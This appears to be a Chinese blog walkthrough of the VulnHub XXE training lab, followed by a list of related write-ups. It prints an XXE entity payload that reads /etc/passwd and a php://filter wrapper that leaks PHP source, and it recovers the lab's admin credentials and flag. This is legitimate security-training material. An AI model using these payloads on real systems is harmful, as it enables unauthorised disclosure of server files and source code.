vulnhub-XXE

最新推荐文章于 2024-06-15 08:30:00 发布
最新推荐文章于 2024-06-15 08:30:00 发布
阅读量487 收藏
点赞数
分类专栏: 安全测试:web\app\工具 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43650289/article/details/107330733
版权

目录

信息探测:netdiscover 

​ 访问80端口 

存在XXE请求包信息 

可以看到用户名密码是通过xml传递给后端的

 查看用户名信息 /etc/passwd

 PHP伪协议

/xxe/admin.php 

/xxe/flagneout.php

  /etc/.flag.php

PHPStudy

下载链接:https://download.vulnhub.com/xxe/XXE.zip

信息探测:netdiscover 

 访问80端口 

存在XXE请求包信息 

可以看到用户名密码是通过xml传递给后端的

 查看用户名信息 /etc/passwd

<?xml version="1.0" encoding="UTF-8"?>



<!DOCTYPE r [



<!ELEMENT r ANY >



<!ENTITY admin SYSTEM "file:///etc/passwd">



]>



<root><name>&admin;</name><password>admin</password></root>

 PHP伪协议

php://filter/read=convert.base64-encode/resource=admin.php

base64进行解密 

 用户名---密码:administhebest  ---- admin@123

/xxe/admin.php 

/xxe/flagneout.php

先进行base32 解码,再进行base64解码

 

或者python

 

  /etc/.flag.php

base64解码:看不懂是啥东西,将返回内容复制保存为php

 

PHPStudy

将代码保存下来,使用phpstudy 进行访问

战神/calmness
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulhub-php_xxe
Mccc_li的博客
04-16 815
test
VulnHub-XXE
热门推荐
江左盟的博客
11-28 1万+
简介 本以为该靶机是利用XXE获取权限,做的过程中才发现该靶机不已拿权限为目的,该靶机为CTF题,目的在于学习XXE漏洞。 靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/ 信息收集 使用nmap --min-rate 10000 192.168.142.136 --script=vuln -sV扫描目标主机发现开启80和5355端口,80端口中间件为Apache 2.4.27,存在robots.txt文件,如图: 访问80端口为Apache默认页面,
vulnhub靶机:xxe
最新发布
weixin_68416970的博客
06-15 944
看不懂,应该是flag.php里的内容,猜测是php代码,于是放入在线的php环境或者自己的 网站查看。php解析器版本是php5才能正常解析出flag,版本过高都会显示不出flag。得到登录密码,因为是在admin.php的源码里于是访问admin.php网址。因为是xxe靶场,于是猜测登录是用xml数据传输,使用burp抓取登录包内容。访问本地xxe.php的源码,用base64格式输出,解码得。全是大写字母和数字,猜测是base32加密,再解密。并无发现,同样的方法查看admin.php。
vulnhub xxe解析
uihijio的博客
07-27 417
xxe原理就不进行介绍了 XXE环境搭建 xxe下载地址: https://download.vulnhub.com/xxe/XXE.zip 也可以进去vulnhub,搜索xxe然后下载 下载之后直接用虚拟机打开ovf文件 安装之后的界面 使用nmap扫描内网,发现一个157地址开放80 打开之后出现下面界面表示安装成功 根据要求是在/xxe/目录下进行测试,如果不知道的话可以用目录扫描工具进行扫描 使用bp抓包 看到用户名和密码被xml语句包含,由此想到xxe漏洞 在构造语句前,目录扫描也有了结
Vulnhub-XXE靶机
djpcs2013的博客
06-10 459
1.主机发现 nmap -sS 192.168.74.1/24 就是192.168.74.158没错了,开放了80端口。 2.前期信息收集 访问192.168.74.158,就是apache默认页。 御剑扫目录。 访问robots.txt。存在/xxe/路径,admin.php。 ip/xxe为登录界面。 admin.php在/xxe/目录下。ip/xxe...
vulnhub——XXE练习
怪味巧克力的博客
04-22 595
今天写一个关于vulnhub上的关于XXE漏洞利用的一个靶场练习 0x01 首先肯定得先下载啊,这里我就不多说了,自己到vulnhub官网下载即可(百度搜官网),然后进去后搜索XXE,下载第一个。解压,安装,靶场布置完成。 0x02 首先我们发现,靶机开启以后是要登录,但是本题并没有给我们登录的账号和密码,所以,别想着去登录了(哈哈哈),那怎么办? 你可能会有疑问,我连靶场IP地址都不知道! 那...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhubXXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
30 天渗透测试练习1.pdf
10-06
6. **Mr r3b0t Vulnhub** - 这是一个Vulnhub的靶机,提供了一个真实环境下的渗透测试场景,挑战者需要找出并利用系统中的漏洞。 7. **Try Hack Me房间:Active Directory Attack** - 这个房间专攻AD攻击,帮助你...
vulnhub-XXE靶机渗透
banacyo14206的博客
08-24 388
靶机: 下载链接:https://download.vulnhub.com/xxe/XXE.zip XXE注入工具下载: https://download.csdn.net/download/weixin_41082546/11609927 CTFCrackTools解码工具: https://download.csdn.net/download/weixin_410825...
vulnhub - xxe
kongshanzhi的博客
04-08 124
这次做vulnhub上的xxenmap进行扫描(nmap -sS 192.168.119.0/24)靶机地址是192.168.119.147访问该地址用dirsearch扫下目录(dirsearch -u http://192.168.119.147/ -e * )看到200的只有两个,index.html不用看了,直接访问robots.txt文件看看根据内容看到robots中声明了两个文件 一个xxe/* 另一个是admin.php我们访问 /xxe看看。
vulnhubXXE靶机详解
天天学安全专属博客
03-20 750
vulnhubXXE靶机详解
vulnhub XXE靶场复现
weixin_44914783的博客
09-19 1450
信息收集 (1)如图,为环境搭建好之后的状态,暂时什么都未知 (2)使用nmap工具对网段进行扫描,获取到xxe平台的IP和端口开放情况,可以判断出该平台IP为192.168.159.223 (3)进行验证,成功 (4)使用kali工具dirsearch对网站进行目录扫描,发现敏感文件robots.txt (5)访问192.168.159.223/robots.txt,再次发现两个敏感文件,依次访问 ...
vulnhub打靶-XXE
m0_52920608的博客
07-18 255
vulnhub---xxe打靶
vulnhub-XXE漏洞靶机流程(图文+工具包)
qq_45514735的博客
03-05 5849
靶机下载链接 http://download.vulnhub.com/xxe/XXE.zip win下全套工具包 链接:https://pan.baidu.com/s/1joOWbE6823GuFyBm92sR0A 提取码:r0xn 一、首先打开靶机 靶机是不给你账号密码的,为了防止你直接混入系统查找flag,通常密码都会先设置的非常复杂,不要想着破解了。 二、打开nmap对内网进行一次扫描找到靶机 在虚拟机里找到你的内网ip池以及掩码 填入nmap,配置选择Qui......
[内网渗透]XXE-vulnhub
leekos的博客,分享web安全相关知识~
07-20 276
其实这个xxe的靶场也不难,就一下常规步骤,之前没有写wp,以后要多总结,多写wp才能更好的复习。
渗透:vulnhub-XXE 靶机
m0_46412682的博客
09-13 1190
渗透:vulnhub-XXE 靶机 一、靶机下载 靶机XXE 下载地址: https://download.vulnhub.com/xxe/XXE.zip 二、装靶机 ①把下载好的压缩包解压到我自己的D盘:F:\虚拟机数据\XXE ②右键双击xxe.ovf-->打开方式-->VMware,存储在自己喜欢的位置 导入后,打开虚拟机 就这样,然后设置nat模式 我们这里的VM...
靶机通关 | vulhub-XXE靶机通关秘籍~
鱼溯的博客
09-20 552
vulhub-XXE靶机通关秘籍~
Vulnhub--XXE漏洞复现
qq_62169455的博客
08-23 346
下载完后,选择OVF文件,打开方式选择VMware,存储位置看你自己,然后打开靶机需要我们去登录,这里是没有现成的信息可以让我们登录(Vulnhub的靶场就是比较贴近于实战的环境,这里登录进去就可以直接看到flag,所以它不会直接给我们登录信息),于是就需要通过其他一些渗透手段来获取登录信息。
[渗透测试学习靶机06] vulnhub 靶场 XXE Lab 1
weixin_47112073的博客
10-23 593
网上看到了好多xxe靶机通关的文章,但是没人写为什么可以实现文件读取,为什么是XXE漏洞,我在这里简单写一下,一来方便自己以后看,二来对还没有接触过xxe漏洞的朋友来说也比较友好
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

战神/calmness

你的鼓励是我最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值